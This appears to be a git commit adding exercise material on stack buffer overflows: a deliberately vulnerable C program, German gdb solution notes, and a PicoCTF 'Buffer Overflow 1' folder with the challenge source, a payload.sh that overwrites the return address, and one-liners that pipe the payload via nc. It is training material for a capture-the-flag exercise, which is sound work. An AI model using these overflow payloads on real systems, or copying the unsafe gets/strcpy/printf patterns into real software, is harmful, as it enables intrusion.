Examples and stuff
This commit is contained in:
parent
1f6b8db99d
commit
525e0ca1cc
1
assets/logic/.gitignore
vendored
Normal file
1
assets/logic/.gitignore
vendored
Normal file
@ -0,0 +1 @@
|
|||||||
|
logic
|
16
assets/logic/Makefile
Normal file
16
assets/logic/Makefile
Normal file
@ -0,0 +1,16 @@
|
|||||||
|
# use bash so process substutution is available
|
||||||
|
CC = gcc
|
||||||
|
CFLAGS = -fno-stack-protector -g
|
||||||
|
SHELL = bash
|
||||||
|
SRC = logic.c
|
||||||
|
TARGET = $(SRC:%.c=%)
|
||||||
|
|
||||||
|
.PHONY: build
|
||||||
|
build: $(TARGET)
|
||||||
|
|
||||||
|
%: %.c
|
||||||
|
$(CC) ${CFLAGS} $< -o $@
|
||||||
|
|
||||||
|
.PHONY: clean
|
||||||
|
clean:
|
||||||
|
rm -f logic
|
@ -3,7 +3,7 @@
|
|||||||
|
|
||||||
void foo(char *input) {
|
void foo(char *input) {
|
||||||
int is_logged_in = 0;
|
int is_logged_in = 0;
|
||||||
char buf[50];
|
char buf[64];
|
||||||
strcpy(buf, input);
|
strcpy(buf, input);
|
||||||
if (is_logged_in) {
|
if (is_logged_in) {
|
||||||
puts("logged in!!1!");
|
puts("logged in!!1!");
|
||||||
@ -13,5 +13,9 @@ void foo(char *input) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
int main(int argc, char **argv) {
|
int main(int argc, char **argv) {
|
||||||
foo(argv[1]);
|
if (argc != 2) {
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
foo(argv[1]);
|
||||||
|
return 0;
|
||||||
}
|
}
|
8
assets/logic/solution.md
Normal file
8
assets/logic/solution.md
Normal file
@ -0,0 +1,8 @@
|
|||||||
|
# Beispiel 1
|
||||||
|
|
||||||
|
* Debugger `gdb`
|
||||||
|
* `list` für Code
|
||||||
|
* `break <n>` für Breakpoint
|
||||||
|
* `run $(python -c 'print("A"*77)')`
|
||||||
|
* `show is_logged_in`
|
||||||
|
* `continue`
|
1
assets/picoctf/buffer_overflow_1/.gitignore
vendored
Normal file
1
assets/picoctf/buffer_overflow_1/.gitignore
vendored
Normal file
@ -0,0 +1 @@
|
|||||||
|
payload
|
17
assets/picoctf/buffer_overflow_1/payload.sh
Executable file
17
assets/picoctf/buffer_overflow_1/payload.sh
Executable file
@ -0,0 +1,17 @@
|
|||||||
|
#!/usr/bin/env bash
|
||||||
|
|
||||||
|
function repeat() {
|
||||||
|
n="${1}"
|
||||||
|
string="${2}"
|
||||||
|
printf "%${n}s" | tr " " "${string}"
|
||||||
|
}
|
||||||
|
|
||||||
|
function main() {
|
||||||
|
buffer_size="${1}"
|
||||||
|
address="${2}"
|
||||||
|
filler="$(repeat "${buffer_size}" A)"
|
||||||
|
newline="\n"
|
||||||
|
printf "%s%b%b" "${filler}" "${address}" "${newline}"
|
||||||
|
}
|
||||||
|
|
||||||
|
main "${@}"
|
10
assets/picoctf/buffer_overflow_1/solution.md
Normal file
10
assets/picoctf/buffer_overflow_1/solution.md
Normal file
@ -0,0 +1,10 @@
|
|||||||
|
# PicoCTF - Buffer Overflow 1
|
||||||
|
|
||||||
|
https://play.picoctf.org/practice/challenge/258?category=6&page=1
|
||||||
|
|
||||||
|
* Buffergröße bestimmen
|
||||||
|
* Return Adresse überschreiben
|
||||||
|
* Adresse der Zielfunktion finden `nm -g -C vuln`
|
||||||
|
* Little Endian!
|
||||||
|
* `./payload.sh 44 "\xf6\x91\x04\x08" | nc ...`
|
||||||
|
* `perl -e 'print "A"x44 . "\xf6\x91\x04\x08\n"'`
|
BIN
assets/picoctf/buffer_overflow_1/vuln
Normal file
BIN
assets/picoctf/buffer_overflow_1/vuln
Normal file
Binary file not shown.
42
assets/picoctf/buffer_overflow_1/vuln.c
Normal file
42
assets/picoctf/buffer_overflow_1/vuln.c
Normal file
@ -0,0 +1,42 @@
|
|||||||
|
#include <stdio.h>
|
||||||
|
#include <stdlib.h>
|
||||||
|
#include <string.h>
|
||||||
|
#include <unistd.h>
|
||||||
|
#include <sys/types.h>
|
||||||
|
#include "asm.h"
|
||||||
|
|
||||||
|
#define BUFSIZE 32
|
||||||
|
#define FLAGSIZE 64
|
||||||
|
|
||||||
|
void win() {
|
||||||
|
char buf[FLAGSIZE];
|
||||||
|
FILE *f = fopen("flag.txt","r");
|
||||||
|
if (f == NULL) {
|
||||||
|
printf("%s %s", "Please create 'flag.txt' in this directory with your",
|
||||||
|
"own debugging flag.\n");
|
||||||
|
exit(0);
|
||||||
|
}
|
||||||
|
|
||||||
|
fgets(buf,FLAGSIZE,f);
|
||||||
|
printf(buf);
|
||||||
|
}
|
||||||
|
|
||||||
|
void vuln(){
|
||||||
|
char buf[BUFSIZE];
|
||||||
|
gets(buf);
|
||||||
|
|
||||||
|
printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
|
||||||
|
}
|
||||||
|
|
||||||
|
int main(int argc, char **argv){
|
||||||
|
|
||||||
|
setvbuf(stdout, NULL, _IONBF, 0);
|
||||||
|
|
||||||
|
gid_t gid = getegid();
|
||||||
|
setresgid(gid, gid, gid);
|
||||||
|
|
||||||
|
puts("Please enter your string: ");
|
||||||
|
vuln();
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
Loading…
Reference in New Issue
Block a user